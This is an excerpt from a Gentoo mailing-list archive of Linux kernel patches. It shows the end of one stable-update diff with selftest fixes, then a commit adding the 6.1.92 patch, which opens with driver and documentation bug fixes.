+ 	evlist__for_each_entry(evlist, counter) {
++		if (config->aggr_mode != AGGR_NONE && counter->metric_leader != counter)
++			continue;
++
+ 		os.evsel = counter;
+ 
+ 		if (!first && config->json_output)
+diff --git a/tools/testing/selftests/bpf/network_helpers.c b/tools/testing/selftests/bpf/network_helpers.c
+index 1fa4672380a92..9448d075bce20 100644
+--- a/tools/testing/selftests/bpf/network_helpers.c
++++ b/tools/testing/selftests/bpf/network_helpers.c
+@@ -459,6 +459,8 @@ struct nstoken *open_netns(const char *name)
+ 
+ 	return token;
+ fail:
++	if (token->orig_netns_fd != -1)
++		close(token->orig_netns_fd);
+ 	free(token);
+ 	return NULL;
+ }
+diff --git a/tools/testing/selftests/bpf/test_sockmap.c b/tools/testing/selftests/bpf/test_sockmap.c
+index e768181a1bd75..d56f521b8aaa2 100644
+--- a/tools/testing/selftests/bpf/test_sockmap.c
++++ b/tools/testing/selftests/bpf/test_sockmap.c
+@@ -2086,9 +2086,9 @@ int main(int argc, char **argv)
+ 		free(options.whitelist);
+ 	if (options.blacklist)
+ 		free(options.blacklist);
++	close(cg_fd);
+ 	if (cg_created)
+ 		cleanup_cgroup_environment();
+-	close(cg_fd);
+ 	return err;
+ }
+ 
+diff --git a/tools/testing/selftests/filesystems/binderfs/Makefile b/tools/testing/selftests/filesystems/binderfs/Makefile
+index c2f7cef919c04..eb4c3b4119348 100644
+--- a/tools/testing/selftests/filesystems/binderfs/Makefile
++++ b/tools/testing/selftests/filesystems/binderfs/Makefile
+@@ -3,6 +3,4 @@
+ CFLAGS += $(KHDR_INCLUDES) -pthread
+ TEST_GEN_PROGS := binderfs_test
+ 
+-binderfs_test: binderfs_test.c ../../kselftest.h ../../kselftest_harness.h
+-
+ include ../../lib.mk
+diff --git a/tools/testing/selftests/kcmp/kcmp_test.c b/tools/testing/selftests/kcmp/kcmp_test.c
+index 25110c7c0b3ed..d7a8e321bb16b 100644
+--- a/tools/testing/selftests/kcmp/kcmp_test.c
++++ b/tools/testing/selftests/kcmp/kcmp_test.c
+@@ -91,7 +91,7 @@ int main(int argc, char **argv)
+ 		ksft_print_header();
+ 		ksft_set_plan(3);
+ 
+-		fd2 = open(kpath, O_RDWR, 0644);
++		fd2 = open(kpath, O_RDWR);
+ 		if (fd2 < 0) {
+ 			perror("Can't open file");
+ 			ksft_exit_fail();
+diff --git a/tools/testing/selftests/kvm/aarch64/vgic_init.c b/tools/testing/selftests/kvm/aarch64/vgic_init.c
+index 9c131d977a1b5..e43536a76b78a 100644
+--- a/tools/testing/selftests/kvm/aarch64/vgic_init.c
++++ b/tools/testing/selftests/kvm/aarch64/vgic_init.c
+@@ -6,6 +6,7 @@
+  */
+ #define _GNU_SOURCE
+ #include <linux/kernel.h>
++#include <linux/bitfield.h>
+ #include <sys/syscall.h>
+ #include <asm/kvm.h>
+ #include <asm/kvm_para.h>
+@@ -86,6 +87,18 @@ static struct vm_gic vm_gic_create_with_vcpus(uint32_t gic_dev_type,
+ 	return v;
+ }
+ 
++static struct vm_gic vm_gic_create_barebones(uint32_t gic_dev_type)
++{
++	struct vm_gic v;
++
++	v.gic_dev_type = gic_dev_type;
++	v.vm = vm_create_barebones();
++	v.gic_fd = kvm_create_device(v.vm, gic_dev_type);
++
++	return v;
++}
++
++
+ static void vm_gic_destroy(struct vm_gic *v)
+ {
+ 	close(v->gic_fd);
+@@ -359,6 +372,40 @@ static void test_vcpus_then_vgic(uint32_t gic_dev_type)
+ 	vm_gic_destroy(&v);
+ }
+ 
++#define KVM_VGIC_V2_ATTR(offset, cpu) \
++	(FIELD_PREP(KVM_DEV_ARM_VGIC_OFFSET_MASK, offset) | \
++	 FIELD_PREP(KVM_DEV_ARM_VGIC_CPUID_MASK, cpu))
++
++#define GIC_CPU_CTRL	0x00
++
++static void test_v2_uaccess_cpuif_no_vcpus(void)
++{
++	struct vm_gic v;
++	u64 val = 0;
++	int ret;
++
++	v = vm_gic_create_barebones(KVM_DEV_TYPE_ARM_VGIC_V2);
++	subtest_dist_rdist(&v);
++
++	ret = __kvm_has_device_attr(v.gic_fd, KVM_DEV_ARM_VGIC_GRP_CPU_REGS,
++				    KVM_VGIC_V2_ATTR(GIC_CPU_CTRL, 0));
++	TEST_ASSERT(ret && errno == EINVAL,
++		    "accessed non-existent CPU interface, want errno: %i",
++		    EINVAL);
++	ret = __kvm_device_attr_get(v.gic_fd, KVM_DEV_ARM_VGIC_GRP_CPU_REGS,
++				    KVM_VGIC_V2_ATTR(GIC_CPU_CTRL, 0), &val);
++	TEST_ASSERT(ret && errno == EINVAL,
++		    "accessed non-existent CPU interface, want errno: %i",
++		    EINVAL);
++	ret = __kvm_device_attr_set(v.gic_fd, KVM_DEV_ARM_VGIC_GRP_CPU_REGS,
++				    KVM_VGIC_V2_ATTR(GIC_CPU_CTRL, 0), &val);
++	TEST_ASSERT(ret && errno == EINVAL,
++		    "accessed non-existent CPU interface, want errno: %i",
++		    EINVAL);
++
++	vm_gic_destroy(&v);
++}
++
+ static void test_v3_new_redist_regions(void)
+ {
+ 	struct kvm_vcpu *vcpus[NR_VCPUS];
+@@ -677,6 +724,9 @@ void run_tests(uint32_t gic_dev_type)
+ 	test_vcpus_then_vgic(gic_dev_type);
+ 	test_vgic_then_vcpus(gic_dev_type);
+ 
++	if (VGIC_DEV_IS_V2(gic_dev_type))
++		test_v2_uaccess_cpuif_no_vcpus();
++
+ 	if (VGIC_DEV_IS_V3(gic_dev_type)) {
+ 		test_v3_new_redist_regions();
+ 		test_v3_typer_accesses();
+diff --git a/tools/testing/selftests/lib.mk b/tools/testing/selftests/lib.mk
+index aa646e0661f36..a8f0442a36bca 100644
+--- a/tools/testing/selftests/lib.mk
++++ b/tools/testing/selftests/lib.mk
+@@ -7,6 +7,8 @@ else ifneq ($(filter -%,$(LLVM)),)
+ LLVM_SUFFIX := $(LLVM)
+ endif
+ 
++CLANG := $(LLVM_PREFIX)clang$(LLVM_SUFFIX)
++
+ CLANG_TARGET_FLAGS_arm          := arm-linux-gnueabi
+ CLANG_TARGET_FLAGS_arm64        := aarch64-linux-gnu
+ CLANG_TARGET_FLAGS_hexagon      := hexagon-linux-musl
+@@ -18,7 +20,13 @@ CLANG_TARGET_FLAGS_riscv        := riscv64-linux-gnu
+ CLANG_TARGET_FLAGS_s390         := s390x-linux-gnu
+ CLANG_TARGET_FLAGS_x86          := x86_64-linux-gnu
+ CLANG_TARGET_FLAGS_x86_64       := x86_64-linux-gnu
+-CLANG_TARGET_FLAGS              := $(CLANG_TARGET_FLAGS_$(ARCH))
++
++# Default to host architecture if ARCH is not explicitly given.
++ifeq ($(ARCH),)
++CLANG_TARGET_FLAGS := $(shell $(CLANG) -print-target-triple)
++else
++CLANG_TARGET_FLAGS := $(CLANG_TARGET_FLAGS_$(ARCH))
++endif
+ 
+ ifeq ($(CROSS_COMPILE),)
+ ifeq ($(CLANG_TARGET_FLAGS),)
+@@ -30,7 +38,7 @@ else
+ CLANG_FLAGS     += --target=$(notdir $(CROSS_COMPILE:%-=%))
+ endif # CROSS_COMPILE
+ 
+-CC := $(LLVM_PREFIX)clang$(LLVM_SUFFIX) $(CLANG_FLAGS) -fintegrated-as
++CC := $(CLANG) $(CLANG_FLAGS) -fintegrated-as
+ else
+ CC := $(CROSS_COMPILE)gcc
+ endif # LLVM
+diff --git a/tools/testing/selftests/net/amt.sh b/tools/testing/selftests/net/amt.sh
+index 75528788cb95e..7e7ed6c558da9 100755
+--- a/tools/testing/selftests/net/amt.sh
++++ b/tools/testing/selftests/net/amt.sh
+@@ -77,6 +77,7 @@ readonly LISTENER=$(mktemp -u listener-XXXXXXXX)
+ readonly GATEWAY=$(mktemp -u gateway-XXXXXXXX)
+ readonly RELAY=$(mktemp -u relay-XXXXXXXX)
+ readonly SOURCE=$(mktemp -u source-XXXXXXXX)
++readonly SMCROUTEDIR="$(mktemp -d)"
+ ERR=4
+ err=0
+ 
+@@ -85,6 +86,11 @@ exit_cleanup()
+ 	for ns in "$@"; do
+ 		ip netns delete "${ns}" 2>/dev/null || true
+ 	done
++	if [ -f "$SMCROUTEDIR/amt.pid" ]; then
++		smcpid=$(< $SMCROUTEDIR/amt.pid)
++		kill $smcpid
++	fi
++	rm -rf $SMCROUTEDIR
+ 
+ 	exit $ERR
+ }
+@@ -167,7 +173,7 @@ setup_iptables()
+ 
+ setup_mcast_routing()
+ {
+-	ip netns exec "${RELAY}" smcrouted
++	ip netns exec "${RELAY}" smcrouted -P $SMCROUTEDIR/amt.pid
+ 	ip netns exec "${RELAY}" smcroutectl a relay_src \
+ 		172.17.0.2 239.0.0.1 amtr
+ 	ip netns exec "${RELAY}" smcroutectl a relay_src \
+@@ -210,8 +216,8 @@ check_features()
+ 
+ test_ipv4_forward()
+ {
+-	RESULT4=$(ip netns exec "${LISTENER}" nc -w 1 -l -u 239.0.0.1 4000)
+-	if [ "$RESULT4" == "172.17.0.2" ]; then
++	RESULT4=$(ip netns exec "${LISTENER}" timeout 15 socat - UDP4-LISTEN:4000,readbytes=128 || true)
++	if echo "$RESULT4" | grep -q "172.17.0.2"; then
+ 		printf "TEST: %-60s  [ OK ]\n" "IPv4 amt multicast forwarding"
+ 		exit 0
+ 	else
+@@ -222,8 +228,8 @@ test_ipv4_forward()
+ 
+ test_ipv6_forward()
+ {
+-	RESULT6=$(ip netns exec "${LISTENER}" nc -w 1 -l -u ff0e::5:6 6000)
+-	if [ "$RESULT6" == "2001:db8:3::2" ]; then
++	RESULT6=$(ip netns exec "${LISTENER}" timeout 15 socat - UDP6-LISTEN:6000,readbytes=128 || true)
++	if echo "$RESULT6" | grep -q "2001:db8:3::2"; then
+ 		printf "TEST: %-60s  [ OK ]\n" "IPv6 amt multicast forwarding"
+ 		exit 0
+ 	else
+@@ -236,14 +242,14 @@ send_mcast4()
+ {
+ 	sleep 2
+ 	ip netns exec "${SOURCE}" bash -c \
+-		'echo 172.17.0.2 | nc -w 1 -u 239.0.0.1 4000' &
++		'printf "%s %128s" 172.17.0.2 | nc -w 1 -u 239.0.0.1 4000' &
+ }
+ 
+ send_mcast6()
+ {
+ 	sleep 2
+ 	ip netns exec "${SOURCE}" bash -c \
+-		'echo 2001:db8:3::2 | nc -w 1 -u ff0e::5:6 6000' &
++		'printf "%s %128s" 2001:db8:3::2 | nc -w 1 -u ff0e::5:6 6000' &
+ }
+ 
+ check_features
+diff --git a/tools/testing/selftests/net/forwarding/bridge_igmp.sh b/tools/testing/selftests/net/forwarding/bridge_igmp.sh
+index 1162836f8f329..6dc3cb4ac6081 100755
+--- a/tools/testing/selftests/net/forwarding/bridge_igmp.sh
++++ b/tools/testing/selftests/net/forwarding/bridge_igmp.sh
+@@ -481,10 +481,10 @@ v3exc_timeout_test()
+ 	RET=0
+ 	local X=("192.0.2.20" "192.0.2.30")
+ 
+-	# GMI should be 3 seconds
++	# GMI should be 5 seconds
+ 	ip link set dev br0 type bridge mcast_query_interval 100 \
+ 					mcast_query_response_interval 100 \
+-					mcast_membership_interval 300
++					mcast_membership_interval 500
+ 
+ 	v3exclude_prepare $h1 $ALL_MAC $ALL_GROUP
+ 	ip link set dev br0 type bridge mcast_query_interval 500 \
+@@ -492,7 +492,7 @@ v3exc_timeout_test()
+ 					mcast_membership_interval 1500
+ 
+ 	$MZ $h1 -c 1 -b $ALL_MAC -B $ALL_GROUP -t ip "proto=2,p=$MZPKT_ALLOW2" -q
+-	sleep 3
++	sleep 5
+ 	bridge -j -d -s mdb show dev br0 \
+ 		| jq -e ".[].mdb[] | \
+ 			 select(.grp == \"$TEST_GROUP\" and \
+diff --git a/tools/testing/selftests/net/forwarding/bridge_mld.sh b/tools/testing/selftests/net/forwarding/bridge_mld.sh
+index e2b9ff773c6b6..f84ab2e657547 100755
+--- a/tools/testing/selftests/net/forwarding/bridge_mld.sh
++++ b/tools/testing/selftests/net/forwarding/bridge_mld.sh
+@@ -478,10 +478,10 @@ mldv2exc_timeout_test()
+ 	RET=0
+ 	local X=("2001:db8:1::20" "2001:db8:1::30")
+ 
+-	# GMI should be 3 seconds
++	# GMI should be 5 seconds
+ 	ip link set dev br0 type bridge mcast_query_interval 100 \
+ 					mcast_query_response_interval 100 \
+-					mcast_membership_interval 300
++					mcast_membership_interval 500
+ 
+ 	mldv2exclude_prepare $h1
+ 	ip link set dev br0 type bridge mcast_query_interval 500 \
+@@ -489,7 +489,7 @@ mldv2exc_timeout_test()
+ 					mcast_membership_interval 1500
+ 
+ 	$MZ $h1 -c 1 $MZPKT_ALLOW2 -q
+-	sleep 3
++	sleep 5
+ 	bridge -j -d -s mdb show dev br0 \
+ 		| jq -e ".[].mdb[] | \
+ 			 select(.grp == \"$TEST_GROUP\" and \
+diff --git a/tools/testing/selftests/resctrl/Makefile b/tools/testing/selftests/resctrl/Makefile
+index 2deac2031de9e..021863f86053a 100644
+--- a/tools/testing/selftests/resctrl/Makefile
++++ b/tools/testing/selftests/resctrl/Makefile
+@@ -5,6 +5,8 @@ CFLAGS += $(KHDR_INCLUDES)
+ 
+ TEST_GEN_PROGS := resctrl_tests
+ 
++LOCAL_HDRS += $(wildcard *.h)
++
+ include ../lib.mk
+ 
+-$(OUTPUT)/resctrl_tests: $(wildcard *.[ch])
++$(OUTPUT)/resctrl_tests: $(wildcard *.c)
+diff --git a/tools/testing/selftests/syscall_user_dispatch/sud_test.c b/tools/testing/selftests/syscall_user_dispatch/sud_test.c
+index b5d592d4099e8..d975a67673299 100644
+--- a/tools/testing/selftests/syscall_user_dispatch/sud_test.c
++++ b/tools/testing/selftests/syscall_user_dispatch/sud_test.c
+@@ -158,6 +158,20 @@ static void handle_sigsys(int sig, siginfo_t *info, void *ucontext)
+ 
+ 	/* In preparation for sigreturn. */
+ 	SYSCALL_DISPATCH_OFF(glob_sel);
++
++	/*
++	 * The tests for argument handling assume that `syscall(x) == x`. This
++	 * is a NOP on x86 because the syscall number is passed in %rax, which
++	 * happens to also be the function ABI return register.  Other
++	 * architectures may need to swizzle the arguments around.
++	 */
++#if defined(__riscv)
++/* REG_A7 is not defined in libc headers */
++# define REG_A7 (REG_A0 + 7)
++
++	((ucontext_t *)ucontext)->uc_mcontext.__gregs[REG_A0] =
++			((ucontext_t *)ucontext)->uc_mcontext.__gregs[REG_A7];
++#endif
+ }
+ 
+ TEST(dispatch_and_return)
+diff --git a/tools/tracing/latency/latency-collector.c b/tools/tracing/latency/latency-collector.c
+index 59a7f2346eab4..f7ed8084e16ad 100644
+--- a/tools/tracing/latency/latency-collector.c
++++ b/tools/tracing/latency/latency-collector.c
+@@ -935,12 +935,12 @@ static void show_available(void)
+ 	}
+ 
+ 	if (!tracers) {
+-		warnx(no_tracer_msg);
++		warnx("%s", no_tracer_msg);
+ 		return;
+ 	}
+ 
+ 	if (!found) {
+-		warnx(no_latency_tr_msg);
++		warnx("%s", no_latency_tr_msg);
+ 		tracefs_list_free(tracers);
+ 		return;
+ 	}
+@@ -983,7 +983,7 @@ static const char *find_default_tracer(void)
+ 	for (i = 0; relevant_tracers[i]; i++) {
+ 		valid = tracer_valid(relevant_tracers[i], &notracer);
+ 		if (notracer)
+-			errx(EXIT_FAILURE, no_tracer_msg);
++			errx(EXIT_FAILURE, "%s", no_tracer_msg);
+ 		if (valid)
+ 			return relevant_tracers[i];
+ 	}
+@@ -1878,7 +1878,7 @@ static void scan_arguments(int argc, char *argv[])
+ 			}
+ 			valid = tracer_valid(current_tracer, &notracer);
+ 			if (notracer)
+-				errx(EXIT_FAILURE, no_tracer_msg);
++				errx(EXIT_FAILURE, "%s", no_tracer_msg);
+ 			if (!valid)
+ 				errx(EXIT_FAILURE,
+ "The tracer %s is not supported by your kernel!\n", current_tracer);


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-05-25 15:16 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-05-25 15:16 UTC (permalink / raw
  To: gentoo-commits

commit:     174de16ebc3197a705f61aa2262db6be4f421fd8
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sat May 25 15:16:20 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sat May 25 15:16:20 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=174de16e

Linux patch 6.1.92

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1091_linux-6.1.92.patch | 2589 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 2593 insertions(+)

diff --git a/0000_README b/0000_README
index b8e8658e..0d537557 100644
--- a/0000_README
+++ b/0000_README
@@ -407,6 +407,10 @@ Patch:  1090_linux-6.1.91.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.91
 
+Patch:  1091_linux-6.1.92.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.92
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1091_linux-6.1.92.patch b/1091_linux-6.1.92.patch
new file mode 100644
index 00000000..fc3ed66e
--- /dev/null
+++ b/1091_linux-6.1.92.patch
@@ -0,0 +1,2589 @@
+diff --git a/Documentation/admin-guide/hw-vuln/core-scheduling.rst b/Documentation/admin-guide/hw-vuln/core-scheduling.rst
+index cf1eeefdfc32f..a92e10ec402e7 100644
+--- a/Documentation/admin-guide/hw-vuln/core-scheduling.rst
++++ b/Documentation/admin-guide/hw-vuln/core-scheduling.rst
+@@ -67,8 +67,8 @@ arg4:
+     will be performed for all tasks in the task group of ``pid``.
+ 
+ arg5:
+-    userspace pointer to an unsigned long for storing the cookie returned by
+-    ``PR_SCHED_CORE_GET`` command. Should be 0 for all other commands.
++    userspace pointer to an unsigned long long for storing the cookie returned
++    by ``PR_SCHED_CORE_GET`` command. Should be 0 for all other commands.
+ 
+ In order for a process to push a cookie to, or pull a cookie from a process, it
+ is required to have the ptrace access mode: `PTRACE_MODE_READ_REALCREDS` to the
+diff --git a/Documentation/sphinx/kernel_include.py b/Documentation/sphinx/kernel_include.py
+index abe7680883771..6387624423363 100755
+--- a/Documentation/sphinx/kernel_include.py
++++ b/Documentation/sphinx/kernel_include.py
+@@ -97,7 +97,6 @@ class KernelInclude(Include):
+         # HINT: this is the only line I had to change / commented out:
+         #path = utils.relative_path(None, path)
+ 
+-        path = nodes.reprunicode(path)
+         encoding = self.options.get(
+             'encoding', self.state.document.settings.input_encoding)
+         e_handler=self.state.document.settings.input_encoding_error_handler
+diff --git a/Makefile b/Makefile
+index a7d90996e4125..0be668057cb2a 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 91
++SUBLEVEL = 92
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm64/Kconfig b/arch/arm64/Kconfig
+index c15f71501c6c2..044b98a62f7bb 100644
+--- a/arch/arm64/Kconfig
++++ b/arch/arm64/Kconfig
+@@ -1752,7 +1752,6 @@ config ARM64_LSE_ATOMICS
+ 
+ config ARM64_USE_LSE_ATOMICS
+ 	bool "Atomic instructions"
+-	depends on JUMP_LABEL
+ 	default y
+ 	help
+ 	  As part of the Large System Extensions, ARMv8.1 introduces new
+diff --git a/arch/arm64/include/asm/lse.h b/arch/arm64/include/asm/lse.h
+index c503db8e73b01..f99d74826a7ef 100644
+--- a/arch/arm64/include/asm/lse.h
++++ b/arch/arm64/include/asm/lse.h
+@@ -10,7 +10,6 @@
+ 
+ #include <linux/compiler_types.h>
+ #include <linux/export.h>
+-#include <linux/jump_label.h>
+ #include <linux/stringify.h>
+ #include <asm/alternative.h>
+ #include <asm/alternative-macros.h>
+diff --git a/drivers/android/binder.c b/drivers/android/binder.c
+index 8c2b7c074eca1..46111f8c12e61 100644
+--- a/drivers/android/binder.c
++++ b/drivers/android/binder.c
+@@ -5350,7 +5350,7 @@ static long binder_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
+ 			goto err;
+ 		break;
+ 	case BINDER_SET_MAX_THREADS: {
+-		int max_threads;
++		u32 max_threads;
+ 
+ 		if (copy_from_user(&max_threads, ubuf,
+ 				   sizeof(max_threads))) {
+diff --git a/drivers/android/binder_internal.h b/drivers/android/binder_internal.h
+index abe19d88c6ecc..c2c1bb3c1e60b 100644
+--- a/drivers/android/binder_internal.h
++++ b/drivers/android/binder_internal.h
+@@ -420,7 +420,7 @@ struct binder_proc {
+ 	struct list_head todo;
+ 	struct binder_stats stats;
+ 	struct list_head delivered_death;
+-	int max_threads;
++	u32 max_threads;
+ 	int requested_threads;
+ 	int requested_threads_started;
+ 	int tmp_ref;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_ras.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_ras.c
+index 9fe2eae88ec17..ee83d282b49a8 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_ras.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_ras.c
+@@ -974,6 +974,9 @@ int amdgpu_ras_query_error_status(struct amdgpu_device *adev,
+ 	if (!obj)
+ 		return -EINVAL;
+ 
++	if (!info || info->head.block == AMDGPU_RAS_BLOCK_COUNT)
++		return -EINVAL;
++
+ 	if (info->head.block == AMDGPU_RAS_BLOCK__UMC) {
+ 		amdgpu_ras_get_ecc_info(adev, &err_data);
+ 	} else {
+diff --git a/drivers/gpu/drm/amd/display/dc/dsc/dc_dsc.c b/drivers/gpu/drm/amd/display/dc/dsc/dc_dsc.c
+index d52cbc0e9b679..5f57bdd597c27 100644
+--- a/drivers/gpu/drm/amd/display/dc/dsc/dc_dsc.c
++++ b/drivers/gpu/drm/amd/display/dc/dsc/dc_dsc.c
+@@ -924,7 +924,12 @@ static bool setup_dsc_config(
+ 	if (!is_dsc_possible)
+ 		goto done;
+ 
+-	dsc_cfg->num_slices_v = pic_height/slice_height;
++	if (slice_height > 0) {
++		dsc_cfg->num_slices_v = pic_height / slice_height;
++	} else {
++		is_dsc_possible = false;
++		goto done;
++	}
+ 
+ 	if (target_bandwidth_kbps > 0) {
+ 		is_dsc_possible = decide_dsc_target_bpp_x16(
+diff --git a/drivers/mfd/stpmic1.c b/drivers/mfd/stpmic1.c
+index eb3da558c3fbd..ee0469d5d4354 100644
+--- a/drivers/mfd/stpmic1.c
++++ b/drivers/mfd/stpmic1.c
+@@ -108,8 +108,9 @@ static const struct regmap_irq stpmic1_irqs[] = {
+ static const struct regmap_irq_chip stpmic1_regmap_irq_chip = {
+ 	.name = "pmic_irq",
+ 	.status_base = INT_PENDING_R1,
+-	.mask_base = INT_CLEAR_MASK_R1,
+-	.unmask_base = INT_SET_MASK_R1,
++	.mask_base = INT_SET_MASK_R1,
++	.unmask_base = INT_CLEAR_MASK_R1,
++	.mask_unmask_non_inverted = true,
+ 	.ack_base = INT_CLEAR_R1,
+ 	.num_regs = STPMIC1_PMIC_NUM_IRQ_REGS,
+ 	.irqs = stpmic1_irqs,
+diff --git a/drivers/mmc/core/mmc.c b/drivers/mmc/core/mmc.c
+index 3a927452a6501..7e39017e440fb 100644
+--- a/drivers/mmc/core/mmc.c
++++ b/drivers/mmc/core/mmc.c
+@@ -1819,8 +1819,13 @@ static int mmc_init_card(struct mmc_host *host, u32 ocr,
+ 
+ 		if (err)
+ 			goto free_card;
+-
+-	} else if (!mmc_card_hs400es(card)) {
++	} else if (mmc_card_hs400es(card)) {
++		if (host->ops->execute_hs400_tuning) {
++			err = host->ops->execute_hs400_tuning(host, card);
++			if (err)
++				goto free_card;
++		}
++	} else {
+ 		/* Select the desired bus width optionally */
+ 		err = mmc_select_bus_width(card);
+ 		if (err > 0 && mmc_card_hs(card)) {
+diff --git a/drivers/net/ethernet/intel/ice/ice_virtchnl.c b/drivers/net/ethernet/intel/ice/ice_virtchnl.c
+index e64bef490a174..42d8e5e771b7e 100644
+--- a/drivers/net/ethernet/intel/ice/ice_virtchnl.c
++++ b/drivers/net/ethernet/intel/ice/ice_virtchnl.c
+@@ -544,17 +544,15 @@ bool ice_vc_isvalid_vsi_id(struct ice_vf *vf, u16 vsi_id)
+ 
+ /**
+  * ice_vc_isvalid_q_id
+- * @vf: pointer to the VF info
+- * @vsi_id: VSI ID
++ * @vsi: VSI to check queue ID against
+  * @qid: VSI relative queue ID
+  *
+  * check for the valid queue ID
+  */
+-static bool ice_vc_isvalid_q_id(struct ice_vf *vf, u16 vsi_id, u8 qid)
++static bool ice_vc_isvalid_q_id(struct ice_vsi *vsi, u8 qid)
+ {
+-	struct ice_vsi *vsi = ice_find_vsi(vf->pf, vsi_id);
+ 	/* allocated Tx and Rx queues should be always equal for VF VSI */
+-	return (vsi && (qid < vsi->alloc_txq));
++	return qid < vsi->alloc_txq;
+ }
+ 
+ /**
+@@ -1254,7 +1252,7 @@ static int ice_vc_ena_qs_msg(struct ice_vf *vf, u8 *msg)
+ 	 */
+ 	q_map = vqs->rx_queues;
+ 	for_each_set_bit(vf_q_id, &q_map, ICE_MAX_RSS_QS_PER_VF) {
+-		if (!ice_vc_isvalid_q_id(vf, vqs->vsi_id, vf_q_id)) {
++		if (!ice_vc_isvalid_q_id(vsi, vf_q_id)) {
+ 			v_ret = VIRTCHNL_STATUS_ERR_PARAM;
+ 			goto error_param;
+ 		}
+@@ -1276,7 +1274,7 @@ static int ice_vc_ena_qs_msg(struct ice_vf *vf, u8 *msg)
+ 
+ 	q_map = vqs->tx_queues;
+ 	for_each_set_bit(vf_q_id, &q_map, ICE_MAX_RSS_QS_PER_VF) {
+-		if (!ice_vc_isvalid_q_id(vf, vqs->vsi_id, vf_q_id)) {
++		if (!ice_vc_isvalid_q_id(vsi, vf_q_id)) {
+ 			v_ret = VIRTCHNL_STATUS_ERR_PARAM;
+ 			goto error_param;
+ 		}
+@@ -1381,7 +1379,7 @@ static int ice_vc_dis_qs_msg(struct ice_vf *vf, u8 *msg)
+ 		q_map = vqs->tx_queues;
+ 
+ 		for_each_set_bit(vf_q_id, &q_map, ICE_MAX_RSS_QS_PER_VF) {
+-			if (!ice_vc_isvalid_q_id(vf, vqs->vsi_id, vf_q_id)) {
++			if (!ice_vc_isvalid_q_id(vsi, vf_q_id)) {
+ 				v_ret = VIRTCHNL_STATUS_ERR_PARAM;
+ 				goto error_param;
+ 			}
+@@ -1407,7 +1405,7 @@ static int ice_vc_dis_qs_msg(struct ice_vf *vf, u8 *msg)
+ 		bitmap_zero(vf->rxq_ena, ICE_MAX_RSS_QS_PER_VF);
+ 	} else if (q_map) {
+ 		for_each_set_bit(vf_q_id, &q_map, ICE_MAX_RSS_QS_PER_VF) {
+-			if (!ice_vc_isvalid_q_id(vf, vqs->vsi_id, vf_q_id)) {
++			if (!ice_vc_isvalid_q_id(vsi, vf_q_id)) {
+ 				v_ret = VIRTCHNL_STATUS_ERR_PARAM;
+ 				goto error_param;
+ 			}
+@@ -1463,7 +1461,7 @@ ice_cfg_interrupt(struct ice_vf *vf, struct ice_vsi *vsi, u16 vector_id,
+ 	for_each_set_bit(vsi_q_id_idx, &qmap, ICE_MAX_RSS_QS_PER_VF) {
+ 		vsi_q_id = vsi_q_id_idx;
+ 
+-		if (!ice_vc_isvalid_q_id(vf, vsi->vsi_num, vsi_q_id))
++		if (!ice_vc_isvalid_q_id(vsi, vsi_q_id))
+ 			return VIRTCHNL_STATUS_ERR_PARAM;
+ 
+ 		q_vector->num_ring_rx++;
+@@ -1477,7 +1475,7 @@ ice_cfg_interrupt(struct ice_vf *vf, struct ice_vsi *vsi, u16 vector_id,
+ 	for_each_set_bit(vsi_q_id_idx, &qmap, ICE_MAX_RSS_QS_PER_VF) {
+ 		vsi_q_id = vsi_q_id_idx;
+ 
+-		if (!ice_vc_isvalid_q_id(vf, vsi->vsi_num, vsi_q_id))
++		if (!ice_vc_isvalid_q_id(vsi, vsi_q_id))
+ 			return VIRTCHNL_STATUS_ERR_PARAM;
+ 
+ 		q_vector->num_ring_tx++;
+@@ -1611,7 +1609,7 @@ static int ice_vc_cfg_qs_msg(struct ice_vf *vf, u8 *msg)
+ 		    qpi->txq.headwb_enabled ||
+ 		    !ice_vc_isvalid_ring_len(qpi->txq.ring_len) ||
+ 		    !ice_vc_isvalid_ring_len(qpi->rxq.ring_len) ||
+-		    !ice_vc_isvalid_q_id(vf, qci->vsi_id, qpi->txq.queue_id)) {
++		    !ice_vc_isvalid_q_id(vsi, qpi->txq.queue_id)) {
+ 			goto error_param;
+ 		}
+ 
+diff --git a/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.c b/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.c
+index 7f72604079723..fb8e856933097 100644
+--- a/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.c
++++ b/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.c
+@@ -107,9 +107,6 @@ ice_vc_fdir_param_check(struct ice_vf *vf, u16 vsi_id)
+ 	if (!(vf->driver_caps & VIRTCHNL_VF_OFFLOAD_FDIR_PF))
+ 		return -EINVAL;
+ 
+-	if (vsi_id != vf->lan_vsi_num)
+-		return -EINVAL;
+-
+ 	if (!ice_vc_isvalid_vsi_id(vf, vsi_id))
+ 		return -EINVAL;
+ 
+diff --git a/drivers/net/ethernet/micrel/ks8851_common.c b/drivers/net/ethernet/micrel/ks8851_common.c
+index 502518cdb4618..6453c92f0fa7c 100644
+--- a/drivers/net/ethernet/micrel/ks8851_common.c
++++ b/drivers/net/ethernet/micrel/ks8851_common.c
